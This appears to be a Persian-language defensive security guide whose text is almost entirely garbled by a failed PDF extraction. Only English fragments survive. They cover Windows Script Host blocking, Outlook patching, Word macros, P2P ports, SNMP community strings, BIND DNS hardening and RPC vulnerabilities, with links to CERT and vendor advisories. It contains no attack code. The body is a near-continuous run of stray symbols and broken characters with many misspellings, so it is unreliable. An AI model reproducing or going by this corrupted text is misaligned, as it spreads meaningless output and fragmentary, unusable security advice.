' u . 3 , ) " ? 59 " U 4 , '? - .0 EXE u_ ) COM ) _ 0, < , 6 3 Z F ? 
@ B '8 ("c ? 59 0 5 6 '$" E F% # F "), ) e 'j 4 FWSH ?,< TG'(,! W L3 # WSH ( E ) 7 , , ? 5 m .1 6% ' ^ P "), ) K F ) / % '?, < T G'" U 4 ,6 3 - _ < _(WSH ^ OG • ' ] Noscript 0 ) T G' g " %/ Symantec ) T G'? # $_TG' g u I ? g MR/ 6 # % '$ # $S 2, 0,< K6 # 0 -, < T "E ? 0 5 d* 0, 5 •* T /2 ! ) ), . $, # WSH ? 6 6 ! $2 ?@ F W L3 ("c 5L S @), , G I 2, 0 < , 6 3 @? ! Z F ?# ? `56$ ) / % '( csript.exe # 0 wscript.exe )= G Cscript.exe myscript.vbs ? 5 TG' g ) MR/ - . : 7 !89 S WSH I h @" ? http//www.symantec.com/avcenter/venc/data/win.script.hosting.html 0 5 - Y ,` :&" -, < ( N U ) ) ? 5 TG' g ^P I 3 $l ' 6 &'( O * 6% ' I ] 0 6 # ( E WSH0, 5 b -, < K 6( $S 6% ) / K5 X , < .scr.vbs,js,jse, wsf,bat, Script Blocking 4gatways U ) SL $? & ) ? , 6 WSH ? -)8! ] ("c @ $ 2, _ 4" - Y # ) #1 6 ) 6h ) )exe pif and 8Q _Norton AntiVirus 2001 ? # $, G C P 6h) ) % ? & , K DY/ a; [ ,Z 2(2 + WSH " ? QS $ ?@ * 2 3@ 0 h @Windows Script Download0 5 'Z 7 G', $ 3 ? 1 ' + , 2R NTFS 6" E " NTFS h wscript.exe ) jscript.exe % H ? i: = G " K6-) )? I ? ^P 9 - 56account V < % ' ) # % ' ) " 0 5 - Y $"), ) PG e 'j 4 7 5 I $ < 6% ') 6 Full Control -) $‰8 W L3 l 'e ) Everyone $, < ? ? 5 $S 2, 0 < ("c " E 'j 4 7 5 I 0, < $ 6 0, , + : uNTFS 6" E TP 5 % < ' I 25 0, < 5 S K6-) )? ) X " %/ $ ) 6% 'MR / ) T wscript.exe ) cscript.exe MR/ % < 6 ,1') 6% ' " I <R V < <R NTFS e 'j 4 7 5 I $ < 7 6 % ' ) ^P a K5 25 , LH B' ) O * $My Computer ? 5 TG'• $ 0,< _% '$ $ u , LH ] -,< O * 0 K5 d* 9 -) $?, 3] " E L3 Y. O* tab 7 (,! Deny ) ?# Allow % ' Property $ ?& % ,P % ' I ) $ NTFS convert drive_letter:/fs:ntfs 6" E NTFSah @ " ? bP \ $Pemission j* 0, 5 # Security j * F) ?@ ) ^P .Y F) ?@ " Property Y. ? 5 TG'• < ^ Account $d I < 5 -,6 " ? I - . W L3 % ' ) d* 6" E • & 0 K5 _000 ) 2 < Security $% ' ^ NTFS 0 • -, , #4 $ Convert ] 0 5 - Y 7 !89 S I5 $ http//www.microsoft.com/windows2000/en/server/iis/htm/core/iidfp sc.htm 0 5 - Y ! 
" % &# 0, Outlook Express, Outlook Microsoft Outlook 7 !89 $l ' 0 ') # $ 6h 5 b $_U '@ -,< K , ?# $ # ) #1 ^P 7 0, 5 Exchange ) K 4" K $ K6 0, < "2 -, < K 0_ - ? &56 ‰: Outlook98 y SL 7 P # ) #1 0 I 5 6 BH ) - $ F !" V 8Q 0, < , 6 3 C A 0 ' ,6 3 3W 3 6% 4 H I W L3 ) ?N IE ^ - Y F 6* %/ - " 6 J) 0 - ,E - Y 9 ) U '@$ , ) T) , ) 1 ) < ,6 3 TP N P ?@ 6 - Y * ?), ] $: , " T#< ") =GX [ 7 F) 7 G ) - ), . ?@ " - Y Z ") B 5! b. , N : <2 C G:H 6j1 $2t5: ) 25 S * " - Y 0, < , 6 3 6 '& F =GX $W 3 L ! I $ 6 &'( SL ?# _ c $l ' # ) 3 $ ) rendenring 0, 5 6 ) H ? 5F * ?@ - 56 , 1 6 '$( '784 2 , G 7c L. ! ] 56${Š "), ) 'G ? " " ] ' ) # Outlook 98 IE - Y a? `56 P Q 4 -, 6 U ) =! > ?@ SL ? ! 4 " HTML 2 -)8! Server V < ? " $7 H8 IE - Yc j* 5 ? ! ) L*< 1 ) 7 ,3 K Backoffice „ 1 # " - Y ? # $"), ) % ! $ U) *] 6 c L. n YBIE ) OE I 4 -, 5/ 0 ) Express Outlook ] _OE Outlook K ! 5E " ? " ) 6 1G'Oulook " 4 l), F # ) #1 bP b 2, 5 $ 6 &'( 4 6 '& $_ ' ) # ("c 78 % , - 4$ ') # BH M ,6 " # 0 < ,6 3 T # ) #1 6 ) 7 !89 , , \X 2 )- $ # ) #1 6 0,< < TP O * &'( P 6h) ) 6@ & ? 5 About I n 9 " Help l' f4 " Outlook ? ! Z 0 , :3 ) 7 , , ") # ) #1 6 -, " * 2K4 0 ' 6 @ 6* 6N F e 'j 4 SL ] 0 ,G - 5< " ? ?) ' 6 BH 3" $IE ) F " U4 $IE TG' $ >! ? ! ) ,< ,6 * SL Outlooka U) l ' &'( 6 K U '@- $?@ SL W L 3 _ -,< K "), )OE 0 B '8 0, < - 6T / " 5 - 56 -,< K " , ,F * -,< E +, 6* * G 6, ) 6( $() * OE e ) !89 6) $ , $ ,F ) 7 5L 6* Outlook9 • Outlook97 • _ < Y & Outlook2002 _ < & ? 5 TG' About * pqqq " a 5 - Y " ] Outlook 2000 • ) Outlook10 ?@ ] OutlookXP • n 9 " Help - 5< " ? OE 2K4 ! Y & Outlook9 ?@ 6* Patch + 0 ' 6@$ " ? !89 -http//www.microsoft.com/windows/oe/. -http//www.microsoft.com/office/ outlook./ + ! ". /0(123& F " U4 ] IE : ) 2 _ -,< SL 0, (N ) ) SL "), ) % ! 6 ?@ - 56 Outlook Express " * IE $U '@ 6 SL * " ,6 3 ,< ! 5E SL " - Y ( ,H ? Outlook -, < K ( N (,! 7 0, < H, , e G ?@ ) K6 0 -,< SL & 0 < ,6 3 HS @e G 0 5 OE )Outlook 6* 3W 3 $ 9 5 %K 75 I & A ! (,! # ) -,< SL 0 < ! 
" %& 456 123& "2 a (E F 7 , , j6 ) l ' R4 S @ % YB* 7 B 5! # Outlook + 6 " Outlokk Express e 'j 4 7 5 I ) SL Outlook ) Outlook Express 7 5 I W L3 4 DY/ I 5 ("c W L3 2 0, : 2 0 =GX 2t 5: -,< SL * ? (N " ) (E a SL ) http//windowsupdate.microsoft.com/ . ] Critecal C L 3 -,< K _ n 9 " Layout 0 6 , & O* 0_Preview] 6 'Show Preview Pene bP " 5 Security Zone] ) O * Options & ? 5 TG' g n 9" a,< : I " View 5#. 2 • 0 # ) #1 High I <b 2 " $7 !89 " 6 5 1 ) % 4 ? 5 T G' g • 0 < ' ? 6Patch / 7 5I ? 5 & Tools - Y • ) A" @ ) X? 25 , @ ' ^ P , # ) #1 6 " •0 % ! " - Y K ?@ j : ("c ? F $, < 2t5: ?@ -, T +P 6h) ) W L3 / $ 5 5X % ' ("c ' • ? " $?@ ? 5 TG'" %P H) , 0 <( E " g ] , 1' ? ! ? , 6h) ) " 6% ' " ("c $ 5 5 X % ' " ,G b ' 5 5X ' $l 'h @ ] 0 5 - 3•_MY Documents 6% 'S #Y ] 5 O* N _ ("c 0 < 3 # ) #1 XSL % <, 0,6 ' ) # " - Y macro Disable I 6% ' / ' F # 2 ,< % ' * 6, • ("c # High , & ) - < HS @),, e G 7c L. : 6% '? 5 T G'" • - 56 5 5 X ) DOC • ? " $_Word I] TG' 0 < ' ` :&" 6 !89 DY/ W L3 6 0, 5 DY/ " ? 59 " K $O * (N (N 7 B 5! $h) ) @ ' 4 h) ) @ ' 4 ) , ,F 6% '? 5 V8 " ? 59 4 0, < ) 6 -,6 # ) #1 6 ? , ?" h) h @" ? 6 U) $O * Œ # ) @ 6 NY67 6 ) (E 5 j 4) @ ) 6h) ) " ) 5 5X @ 7 L 6 " - Y " %P H h) ) , Q% Q $7 , , 2 , ,F % 0, 6 )- 6 &'( L %H , / 6h) ) , , " %P H $Œ # n 9 " 6( @ ) 6h) ) $ 6( 6 I5 - ? @b 7 # $h) ) 6, I 5 0, BH $ P DY/ 6 & $ " ,G 0, 6% '7 L +F )O * , % < (N # ) #1Preview $ I 5 0, $ ' http://www.microsoft.com/security/protect/antivirus.asp0 5 - Y A ) # QS $Outlook + Express OutlookG Outlook Express j &'M,6 ] $l ' * " 2 3@ ' I 5 0_ c g] , 1' ?@ , ? G 6h) ) " " / ) N 6% ' ' 7 G', ' 3 2 _ O* 6% 'S #Y] F \) < : 5 O* N ) DOC 0,6 ' ) # macro Disable ) 6% ' / 0 - < " - Y ' ,< % ' * 6, • ("c # High , & F # 2 HS @),, e G 7c L. < - 56 5 5 X % '? 5 T G'" • # ) #1 XSL % <, • ? " 0_ ("c 0 < 9 l 'h @] 0 5 - 3•My Documents ,G b 5 5X 3 ?1 5 ) 6 BH ("c 5 X % ' , 1'? " 'Z _Word I] T G' 0 < ' ` 6 DY/ W L3 !89 6 , 5 (N (N 7 B 5! h) ) @ ' 4 h) ) @ ' 4 ) , ,F 6% '? 5 V8 " ? 
59 4 0, < $ ) -,6 6, I 5 0, BH 6 # h) ) K $O * DY/ " ? 59 " P ? @b U) ? " $O * @ 6 6 # ) #1 6 ? , h) ) I # +F , :&" 6 &'( ) 6h) ) $ 6( NY67 6 6 ) (E 6 ) 6h) ) " I 7 L 5 j 4) , , " %PH $ ) 55X @ Q 7 , , 2 , ,F % 0, 6 )- Q% L %H , / 6h) ) " - Y " %P H h) ) n 9 " 6( @ I # @ )O * , % < DY/ 6 & 0 " ,G 0, 6% '7 0, A L (N # ) #1 $Preview . http://www.microsoft.com/security h @ " ? $ ' ) # 0 5 - Y /protect/antivirvirus.asp Outlook Express M, 6 ] 'Z " ? 7 G', $l ' " ? 59 * ' I 5 0_ c U '@ 6 )d * 7 L l' . 7 K &F " 6 @ I XP Security h @ " ? # 7 u ) Outlook ? 4 (N 5 ("c 0 5 - Y white paper Office # 2 $,< #P< ? , 0 < -, " Outlook ) X ) ("c " bP 7 5 I ) 6T5! " %P H I5 , ( N6 0 5 - Y Offece Product 0, 5 $XP U '@ * - < ) 5 ) 6 BH j &' http://www.microsoft.com/windows/oe h @ I5 0 5 - Y Updates page h @ " ? ^ QS $ 9 Outlook Express 3 ?1 2 3@ Outlook + " * 5< , \89 # ) #1 6 " ( N6 ^ \X $ 7 K &F <@ 0, 5 - Y Resource Kit Office Outlook Express U) 6 ) # ) #1 6 ? 5 Uninstall I N W 3 ( ,H ? $ ? "), ) 6* ) 0 5 ? ME Setup - Y 7 !89 , -, • Outlook SL 7 ? 5 Add/Remove Program • Outlook ExpressSL 7 ) {† "), ) ) O * ) Windows " # ) " Outlook Express ) Outlook a 5 & " - Y Outlook ? 2 &Uninstall & ) Add/Remove Progtam ? # @ O * 0 5 6 ' ?@ MR/ ?# Outlook Express ? XP a 5 - Y • Outlook Express SL 7 ) pqqq "), ) ) " 6h @ " 9 7 B 5! , `4 F Outlook Express Version 5. X/6.0 * h @" , - Y , " pqqq "), ) ? 5 … - Y http://support.microsoft.com/default.aspx?scid=kbEN-Usq263837 0, 5 Outlook Express Version 5.x/6.0 * h @" , - Y $, " ME 5 ) {† "), ) ? … - Y http://support.microsoft.com/default.aspx?scid=kbEN-Usq256219 0, 5 R4 S @ : 2 5 Wimdows Peer to Peer File Sharing (P2P) 6 ' ?# 2 ) 0, < ' User mode I " , H- Y ' $ K, ) " ]- 2 l' 6 h -, " - 3• >' I 4 -, ? G? , 6- I N 6 #P< " % ' ' ? , ) SB g -,< K 7 < & ? " ) +" 0, 5 ) 6' )d* < 3 )V# $ 6% 'V < 2, U) ? N - Y Q " - Y H? , I5 l ' 6 code Source Napster b 6 9P T " \ 2 - Y _ /) 6 , 5 6 2 H U) 6 +" ) Download )Y \ 5 <2 I 3 ?1 7 L SB g l' 6 " I ! 
B B 512 U) ?# 1 &5 ) ,< d l ' R4 S @ : 6 n 9 " -, < 1P 0, 5 ( 7) Y -,< - < ^ P ) -, 0 E F 6- E F U) I &' 6% ' , )- ? 0, R V < 6% 'T )?@ download 2 , 7 5 „ 1# 2 LAN ,63 L ? 6 F 1 ), 5 ) 5 0 5 ' $ 6% 'T F) & WAN 6 H ,F , , ) S @ e G (E U) '/ < \ N 7 4" - Y K - 1% I l' \P < ?# W 3 6 P2P ) (E 6% < , 67 4 " X / I5 ?@ http wrappers " - Y " - Y ) E F ^P 0,< ( ,H ? " ?56 - Y e 'j 4 I ), . ("c 78 I ^P , @ ' <] -, I 0 ' , 6 3 -, 6 #P< 0 < ,6 3 % < I _-, Q 0, < ) 6 ' E F 0, 5 upload 2 , l ' 6 -, < T 5! 3 ? &56 : , . 2' T/ v 4 6 6 ? " i: multithread / ) j &' " - Y ? " 5 "E g DOS \ " 85/ ;! , ) _P2P -, U) 7 !89 23 , - 9 * F) 0 < <R V < ,F : < _ …) F) & ^ 6 &'( $ \X ] L $ 2 , #4 : _ % < P2P $ " ]& B'\ l '7 , , 0 ' =GX % 1 , ] #P< ),. H %K N` 6] : 2 0 ] 7c L. -, 6 K 6 n 9 " -,< K 6 \ 2 " ? , . 6 _ , <b . TP - Y )_ ) B' 0, 5 F $() * % ! _0 F 6* 5 -, < < "), ) ) F) & U 1) U# ^P SL % ! P2P ? I5 6 +, ,G ^ 0, < 3 W 3 j1 #P < ) 5 - Y "), ) 6* : ,, 2 e G P2P a " \ 2 b -, < - Y T) , 2 P 1 & ?@) < ! ". 0(123& 6 " - Y d * 4 4 ) " 6* ] + ,6 3 TP, 6 " : #P< ' y 2 < • 6 6 b C 5! application layer strings ' E F• - Y P2P 0 -, < download . T I #P< " - 3• 6? # _exe, mp3, wma, avi, mpg, mpeg, jpg, gif, zip 0 "@ 'D j6 #P < " - 3•Z>'y ! " %& (E )Y 7 B 5! 6% '] $l ' R 4 S @ : % • b • 456 123& DY/ I 5 a ? " ? H ) dowmloading 6 ^P | < " - Y • T G ? " ? " g 6 " - Y - . . #P< 6- N ^P " - Y • T G ) #P< " • - 3• >' 5 0" E ;N8 6 &'( C L3 &'( SL H 5 3 • 15G ? 0, < P2P T P2P 6 b I ) 4 -, 6 U ) " - Y • -,< - Y 67 4 _ ) ) | F) 3] y P2P ^P ' 0-,< ( N h) ) -P2P + , B'• • C L3 #P <y @ 6 &'( " & \ 2(18 1 5 ") - Y • + ,C 2 _••{{ $††}Š $†††† - 5< TCP 67 4] Napsster • _‹••Š $‹••p $‹••w - 5< TCP 67 4] edonkey • •s‹} $•s‹• $•s‹Š - 5< TCP/ UDP 67 4] Gnutella • 6- 5 < TCP 7 4]Kazza • TCP/ UDP 7 4 ) www wp‹w - 5< ! 
" % &# , Simple Network Management Protocl (SNMP) -N 5 SNMP " - Y 784 2 ) , , #4) ) - " y #4 I 5 ?@ " # SB g $T 0 < 1 )$ I 5 SNMP %# ) 4 " - Y TCP/IP - Y P ' 4 #P < 7) Y 6 6( ' - ) 6Access point $ 6ˆ K $ 6 ) $ N4 ' 0 < SNMP , 6( 4 ^ 6N 3 2 ( 4TP B % , 6- N $SNMP -, < - Y b o F & $ SNMP N& S ^P % < 0_, 5 - Y ] #P< ) 3 $l '7 !89 " - Y Q 0, < R4 S @ ^ ? 5 SNMP u - 5< * $SNMP 0_, * L3 7 L _U ) 3 ,K B! " ,G b R4 S @ ^ < $h _?@ / X ! 6- ' ) !89 -,< %L 3 M,6nH ) S -,< K 6v 6( 4 , K " $SNMP * I5 j ,4 ] < TP, P " - Y 6N 6N O* H e 'j 4 7 L ? , 6T, " - Y - 5< * #4 PG ) , K R4 S @ ^ 3 , G ) T G' SNMP ,G " $SNMP ) ) ,1 " I5 7 K &F SNMP 6( 4 " < 0, < R4 S @ ^ , ) , ) 7 !89 Z ', 2 5F ) H $l ' R 4 S @ ^ - Y SNMP 3 785/ & c L. $ N #4? bP R4 S @ ^ 6* 5 i: j &' I 5 ? , 6N SNMP 6A) " - Y (,! 0, 5 ! N " $ #P < A) " [ P e 'j 4 A N 0,< 6 0, < 3 gV " PG ) , K (& # ) -,< 1P ^ P SNMP 5 , H ? G -, < & < ) 6 3 7 & E ) 7c@ 2< ] V ^ - Y 6A) 6( 4 6A) " [ 0_78# , 6A) 0, 5 -, < - Y , 6A) " $SNMP )Y " ] DOS \ " 7) Y 785/ ( E ? ' 0, < I5 $qs …pqqp CERT – h @ R4 S @ ^ 0 5 -,6 0 6N ! B 5F " $ 6( 4 " * ] SNMP - 5 _ - Y $ #P< y I 5 -,< - Y : I K 6N H , 5 6T, " - Y 6A) W L3 ,1 K ]0, < ("c , U) ? G SB g )0 2#5 #P< , 7c . A) SNMP0, < Point 6- N U 1) U# -, < d * 0 3 $UPS 6N ^ ) $ 6 N4 , 7) Y /f =GX % 1 , : 9P Bridges ) access % ! P 785/ &1@ " % #4 B5# I 5 -, < - Y SB g SNMP " 0 #P< 7 & E $ ) SNMP , , b ) Windows Service (&B SL 6* $SNMP 6 SL $ #P < ) 6 7) Y embedded e 'j 4 7 L $SNMP 5 TG'"), ) F 2 6* 0 < - Y 785/ Q 0 $() * * SL Q 0, < - & - 5 "), ) % ! +, 6* 5 T G') SL e 'j 4 7 L l 'U ) SNMP l ' R4 S @ : P 5 CP 0, -,< K W L* #P <% ! 6 0 < ,6 3 + $ #P< -, < % L ) F 5 $SNScan N 4 6N ) 0 5 - Y . Foundstone. http://www h @ n 9 " " - Y ? # # 0 SNMPZ F ) SL W L3 GF ? ^ % ! T G'd * -,6 ) " - Y SL ) "b 5 I5 A) " ? ) #5 ? ? <" 67 # n.7 a < ,6 3 - "2 Com/knowledge/free_tools.html ' $ 2 netstat w•p ) w•w ) ! ". /0(123& SNMP SL I 5 ("c 7 B 5! $SNMP " b3 ) 6- N H,, e G ?@ ? ("c 7, U# , 0 KF 0 (E ( E 2 6& 7 L - 4- ." 
)- @\X 4 ) F) N 4 6 @ " U4 (E 6U ) SNMP E F) 7 B 5! 2 netstat-an H,, )S @e G $SNMP -, < - Y ) e 'j 4 SNMP Community ] 13 F) _ P ! h,/ % H SNMP Community F) Community SNMP Y* F) 6 < ! " %& DY/ 7 ,H ? 0 5 ") 456 123& $l ' R4 S @ : % DY/ I 5 6, " -1 < $( ? ! "+ , I 5 $SNMPv3 ) 6( 4 , K 27 456 SNMP ? 5 TG' g ?@ " - Y 7 ) X (,! 7 P T, " - Y _?# 7 Patch * 2 3@ ? $? , $) ) , 1 7 L* " TCP/UDP w•w 7 , 4] , K5 0 K6 ),. agnt b ^ b agnt 6@ B' #P < (E 6 % ! SL $-, ) ) P $ ) 6- ,1 b 3 , ? & P A R 4 W L3 T ("c T P !89 y SNMP 3 3 6N " ? 6* B'T) ' " - Y 0 ? 5 V8 w•p 7 4 ) 2#5 l ' J) 0 $?@ " ,G ) pqqq"), ) 6 9 F) F 3 7 L l '7 B 5! ? 6 -,< K SNMP B SNMP agnt b 6 6 N& SNMP " - Y 7 * l '7 B 5! 0_TCP/UDP ) X # - Y SNMP agnt ] 6- $CERT Advisory CA-2002-03 5 5X j* 0 5 GF [ 6& ? G ? 1 ) $,< Q 0 (E ( E IPSEC & ?& B' ) 0 < +H ) ` 6 ?@ " - Y 7 ) X (,! 7 +, 8 456 SNMP ? 5 TG' g I 5 $SNMPv3 ) 6( 4 , K P T, " - Y _?# 7 W 3 " 2 0 ) ) 7 $) ) * SNMP " - Y 7 P! L )- h,/ % H g , O* 0, < )" @ W L3 3" ? N& 6& ? G -, < - Y ] community - Y _ ( #. ] 6- ("c : 2 0 I5 N u& ("c "W 3 P F 7 # " - Y (E P ! 6& $http://www.sans.org/resources/idfaq/snmp.php h @ 6 ),. -,< ' -, < K 0 b) w•w 7 B' #P< ) ) 6- l '7 B 5! 0_TCP/UDP # #40 4], K5 (E $-, < & 5 $ , F) F 3 7 6subnet 2 SNMP " E ' B I & - Y SNMP 9 w•p 7 4 ) TCP/UDP L 6N , I5 C ' ) X y # B' , 0, 6 ( E Q I c2 ' R4 S @ ^ 2 U 1) U# !" 1 23 4 0, <P 7 !89 " ) 0 ) %K 25 : -, < =! > ?@ 56 $ 5B !C 8 ? , ) 5L M 9 A 'D (E ! 5E 2' /) F &1@ 6 GH ) 5 2' H? " ?@ P 4) " R4 S @ ^ 3W 3 P B 9 F) % 1 , ' ?5F ) - 5 - Y -,< 3 < $ 3 M ,6 % , , N ?# - ) 6? " & 5 ?5F ^ 2 " S @^ N &1@ ) S 6@, 5 D Y/ c ) [ 3_ O * 7 < \ R4 S @ ^ ) 6 Y/] ) X F 78# " V, ,G 6A) 2 , ,3 %K " 6 O * M,6? G Cod Red ) % ! 7 !89 ? @ > GP 8 $ B I 6 ? Q 6U ) 6 & $ ?5F 0, 5 ) 6( I RN6 2 #P < E ) 6 " - Y Z I N ) ! Y 785/ T) , % ! =GX ^ N` 6?), ) - # M 9 ( &@ I J 0 ,G 6 - 6 O* I 56$ % ! -") P % ! : ), F 7, , , - . 6; . " - " M 9" ) , < % ! @) &' * + # $% ! 
6 R4 S @ < b R4 0, < ) U# R4 S @ ^ F) B !$ ) 2 R4 S @ ^ R4 S @ d * N 560 " ,< ,6 3 K 6 'G " U4 2 <) , , e G % ! $ R4 S @ ^ " 6% c 3 6 ! 5E 4 63U $ 1 =GX N 4) B - . % ! 6 R4 S @ ^ -, " ) <@ ? @ ^ &1@ ) ! ? " F) " [ < )@ 785/ ) 7 , , SB g $, 6 '?5F #P <) F ? , " ) 4 , 1) $ - < ?@ R4 S @ ^ " % ! 6 S 0 3 =GX I bP G ) i: " - \ 785/ F -, 5! -) - -") K6 F - F , 5 - Y % ! U# R4 S @ ^ R4 S @ ^ ("c 6%5G1 % < B5# ) , Y 7 !89 ? F 2 5F ("c 7 ,H ) 6 I ;&2 - Y - ? F i: 0, 6 ( E ) - < b f ! "M &# ( $ % ! " , G 785/ ? ? G _7) Y 2 ? 6 # $U# 0 6 * ] U# $ -,< ( E - ) a- 5 BIND Domain Name System Remote Procedure Calls (RPC) Apache Web Server Generl UNIK Authentication Accounts with No passwork or weak passworde Clear Text Sevices Sendmail Simple Network Mangement Protocol (SNMP) Secure Shell (SSH) Miscon figuration of Enterprise Services NIS/NFS Open Secure Sockets Layer (SSL) BIND Domain Name System ) - $ (Berkeley Internet Name Domain) BIND &'( h - Y DNS_Domain Name ] " BIND 0 / 5 IP h @ _http://www.srco.ir/ a #P < \ " C L3 $ 785/ ( E ( E ?@ I5 S ^P 1 ) $, - - 4 # (E ? ,6U) M,6 0, < R4 S @ ^ ) -, , !" #4 DNS T# < ") BIND K6 j CA- CERT 785/ N " , 5 dOS \ K : l 'F 6v 4 T " 0 H ?@ -, ) - Y DNS ;! BIND -, 6 U ) Dos \ " F >/ 0, < R4 S @ ,G % Z #4) W ZF $ Dos \ " F B 5F " 0,< " F ! L3 ) X ", Cache < TP, ^ -, < = 7 K &F Advisory2002-15 H Overflow \ " 3 : Resolver + ^ ") < " - 4 F ) DNS 3 2 $ 3 7 K &F ", F) : 5F 2 6 ' l ' R 4 S @ : " - Y Z ?# $ - *1 , ,, 0 5 " ,G " 6 N ") 2 0,6 <R " R4 S @ ^ , CA -2002 -19 CERT Advisory 1 0 " F $ " $l '785/ K6 3 # 1 0 E ? & ) 9 785/ 5 $ 6% 'S : ? ' I5 ? , $ 5 ,H ) Buffer Overflow =GX ?@ ?5F < TP, , L Bind deamon ? @ ) l '% ?@ " - Y -,< ? G ? 5 M 9 ? , ("c 6 @ (, ! a, * 0 (, ! ) DNS U ) <8 BIND ? , )- F I5 785/ ) O * _Dos] Denila of Service ! 6U ) g7 % ,P I / - N F ) BIND " - Y ?@ 0, - I] ? & - 4 , R4 S @ O * /) N ?@ " ) - Y l ' GX) " ? 5F - Y @ , 6 6 @ ?), ) 1G' I 5 2 3 PG g 0 #P< 6- '784 ? 
G -, 6 U ) F " ?5F 0 R4 S @ - 5 U 2 , 0, 5 - 3O * ,6 3 BIND " SL ?@ ) * 1) U# Ž6, 6 U ) 1 & S - $() * , -, < K BIND " * # +, 6 ? G? & 5 C P , #47 0,< ,6 3 + ) ) K % ! BIND " - 5 6Patch 2 3@ " - Y K ? 59 BIND * ?@ " " - Y 7 SL BIND # 5 % S @ T5 / $,< -, Patch % , 6 3 j 5 X.Y.Z 7 Level Patch ) ?@ ) " ?@ ? )- , N 2 3@ " H 0 ) Z) * Symantes 6 @ -,< ( N N 4 - Y & $ I " ? R4 S @ ^ d * P 3 $ 0 < ,6 3 4 " BIND bP ) -,< F) R4 W L3 Y$ B -,6 X * N 4 2 3@ 0 5 SL # 5 2 ' ISC >! $ BIND 6-) 0 I 5 DNS R4 S @ ^ * 2 3@ $ 6, 6 6 ! " %& a / -,< SL BIND * F 6 #) " -,< 2 3@ SL " -, < K BIND * N ,1 b 0 5 % * 7 K &F -, 6, Version 9.2.2 v bP -,< SL X !] -, 5 ,H Q L ISCb ' )- 6 -, 6, $ 7 BIND # ^ : ? (N / ? 59 BIND * ("c 7 !89 v named a 0 3 * ( E _-, dInternet Sofward Consortium :ISC ! ". /0(123& % nH 456 123& DY/ I 5 ) • l89 & named ?@ ] BIND deamon ? 5 TG' g _ N 4 I 5 0, -, BIND &'( ' ? DNS -, 6 U ) I ? G _?@ ,E ? 5 TG' I ] W 3 7 K6 u 3 0 5 MR/ 6 )? , ,1 b 6Patch -, 6 U ) -,< K B5# 7 !89 ' 0, 6 Z Checklist j* ) CERT " * N (N 2 3@ " BIND -,< K 7c T5! " ) " • I5 ?@ ?# 7 2t 5: SL : 0, K5 - Y $ UNIX Security Banner ^ g * j 4 ) 785/ ? 5 BIND GH ) * - 5< -, ` 4 ) MR/ BIND " • I5 Version String 0, K5 2 &N F _ named DNS servers) % ' DNS [? , 6U) Zone 7c Zone 7c C ' T GH ) • ?# ? # _secondary DNS servers], K5 6 'Domain ^P Child ) Parent ^ P ? # " % ) T G' g 0, K5 - Y _Forwading] y #B 5! % DY/ 6 Domaion R )] Delegation ) ') _ 1t • glue fetching ) Recursion ? # I5 0, K5 TG' g DNS Cache i . 5 ? H . ) named" " - Y [ non – privilage : ? G BIND 2 Privilage h @ " BIND 9 - 5 < * DY/ , K5 ),. • I5 BIND $ Z F Chroot 0 0, K5 - Y http://www.losurs.org/docs/howto/Chroot-BIND.html h @ BIND -, < = R4 S @ ^ bP ) 3 785/ % DY/ I a 5 - Y h @ " ISC BIND 0 h @ " ISC 0 : Dos R 4S @ " ? : • - Y http//www.cert.org/advisories/CA-2002-15.html BIND - Y 9 "+ 8 : DoS R4S @ : 2, http://www.isc.org/products/BIND/bind-security.html • 6 ) BIND 25 SL I 5 ("c 7 4" - Y ) 6@ ) Running the BIND 9 DNS Server Securely a h @ " ? 
0 5 - Y Afentis h @ $U c -,< K 7c <@ Remot Procedure Calls (RPC) K62 ) F H B 5! - N F F 0, < U) ( E K I " )- T n 9 " () ?@ " - Y RPC - Y NIS ) NFS % 'V < $ ) - " , I #P < -,< +" 6 ; G RPC ,G 6=GX F) 6U ) Q RP @ ? 5F RPC 6" E 6 " - Y T % ) ) 1999 T RPC ,G RPC " - Y 6 T) , I ?@ " f F )- T 5G ,/ " j 0, ) H"E @ =GX S DoS \ " 785/ Q R4 S @ : ) : %1 , $ # g F I F) & C 3 0 0, i: & @ ' )- y 6, -,< = - 785/ 8Q RPC \ ' 7 ") 6U ) RPC DCOM ;! "), ) ?@ ) U R4 S @ ^ - $() * -,< SL RPC F 2000 ^P : # ZF 3 M ,6 K6 - ( 2, , 0, < , 6 3 =GX 6 -,< YB* 785/ +, 1 ) U# 6* 5 0, < P , , e G ! ". /0(123& " # Z F" ? $ rpcinfo" a, RPC Program ) - @ R4 S @ ^ ) N 4 " - Y RPC T) , 6U ) RPC SERNIS Number 100083 Rpc. Ttdbserverd P! Rpc . cmsd 100024 Rpc.statd 100005 Rpc.mountd 100232 sadmind 100235 Cachefsd 100249 Snmp Xdmid buffer Overflow 785/ n 9 " C 5! RPC H- Y Z 6- 100068 ) 6:3 W L3 ' ) ("c ? # 2 $ Buffer overflow R4 S @ ^ _O * , 7 L SB g] j4% H ) Z:3 : , <P -, " b RPC , 5 F , 5 T , B ) h / K6?# O * , Overflow & @ 1 " E RPC g- F =GX 4 - Y 6U ) l ' R4 S @ ^ ( E ,! " " ,G # " & @ 0, 5 2 6 - Y 4 ) X RPC " $ I'/ ?) 1 - 6U ) " K6U ) : . " Z F% ! Z F T 5G ,/ " j g 6 ?# , 456 123& P% DY/ I 5 • 6MR/ ) ? 5 TG' g 0,< F) ? @ MR/ ?# $- , 5 F ) - " )"E RPC ) ) 6 'F ! " %& a B ! 0, b ' F ' - Y , 6' 6U ) 5 #P < ) ?@ " • -,< K Patch 2 3@ SL a 0 - Y _http://sunsolve.sun.com ] h @ " U c http://www.ibm.com/support/us 0 a h @ " IBM , &'( AIX - Y http://techsupport.services.ibm.com/server/fixes) ) http://www.redhat.com/support/errata a h @" U 0 7 L http://www.debian.org./security - Y Patch 2 3@ SL ) 6 @ 9 1 I5 E F7 B 5! 0 <( E 5 135 7 4 ) RPC portmapper 0, 5 V8 T) ' ) UDP ) TCP , K5 V8 $ l ' J) " 785/ 5 % 785/ " 3 B ^ 32789, 32770 Loopback 6 DY/ windows ) i: ^ B! _ UDP ) TCP] 111 7 ^ ) F c $ KF F [ g B! , g 4 5 4 4 _UDP ) TCP] 67 4 ? 5 TG' " - Y 0, 5 5/ 1 ) - PBuffer overflows 0 TP " %/ NFS % ' 6 $ , ^P a 6 P IP/ ? & " - Y 1 , 3 b'7 L R4 S @ ^ - Y " 6h @ " ? 
